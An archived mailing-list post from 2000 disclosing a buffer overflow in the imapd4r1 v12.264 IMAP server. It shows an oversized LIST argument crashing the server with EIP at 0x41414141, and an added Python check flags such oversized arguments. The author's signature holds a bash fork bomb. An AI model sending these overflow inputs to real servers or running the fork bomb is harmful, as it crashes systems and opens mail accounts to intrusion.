Subject: imapd4r1 v12.264
From: Michal Zalewski (lcamtuf DIONE.IDS.PL)
Date: Sun Apr 16 2000 - 07:19:43 CDT
- Next in thread: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Tibor Pittich: "Re: imapd4r1 v12.264"
Newest RH:
* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
*sigh*
Privileges seem to be dropped, but, anyway, it's a nice way to get shell
access to a mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need a code security audit.
_______________________________________________________
Michal Zalewski [lcamtuf tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
===========================================================================
This message came from the list <secure mud.pl>
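
As an added example (not part of the original post and not code from imapd), here is a check that a proxy or log pipeline could run on client-to-server IMAP lines to flag the kind of oversized LIST argument shown in the transcript. The thresholds, function names and sample lines are assumptions made for illustration.

```python
import re

MAX_ARG_LEN = 1024   # assumed limit for a single argument, not from the post
MAX_RUN = 64         # assumed: flag 64 or more repeats of one character

# Constructed client lines modelled on the transcript above.
SAMPLE = ['1 login lcamtuf test', '2 list "" "*"', '3 list "" ' + 'A' * 4000]

def split_args(rest):
    """Split IMAP command arguments into atoms and quoted strings."""
    args, i, n = [], 0, len(rest)
    while i < n:
        if rest[i] == ' ':
            i += 1
        elif rest[i] == '"':
            j, buf = i + 1, []
            while j < n and rest[j] != '"':
                if rest[j] == '\\' and j + 1 < n:
                    j += 1          # keep the escaped character
                buf.append(rest[j])
                j += 1
            args.append(''.join(buf))
            i = j + 1               # also ends the loop on an unterminated quote
        else:
            j = rest.find(' ', i)
            j = n if j == -1 else j
            args.append(rest[i:j])
            i = j
    return args

def inspect_line(line):
    """Return (tag, command, arg index, reason, length) findings for one line."""
    parts = line.rstrip('\r\n').split(' ', 2)
    if len(parts) < 2:
        return []
    tag, cmd = parts[0], parts[1].upper()
    if cmd == 'LOGIN':
        return []                   # never inspect or record credentials
    findings = []
    for idx, arg in enumerate(split_args(parts[2] if len(parts) > 2 else '')):
        if len(arg) > MAX_ARG_LEN:
            findings.append((tag, cmd, idx, 'oversized', len(arg)))
        elif re.search(r'(.)\1{%d,}' % (MAX_RUN - 1), arg):
            findings.append((tag, cmd, idx, 'repeated-byte run', len(arg)))
    return findings

def scan(lines):
    """Inspect every line and collect the findings in order."""
    return [f for line in lines for f in inspect_line(line)]
```

IMAP literals (the `{n}` syntax) are not handled by this splitter and would need their own length check.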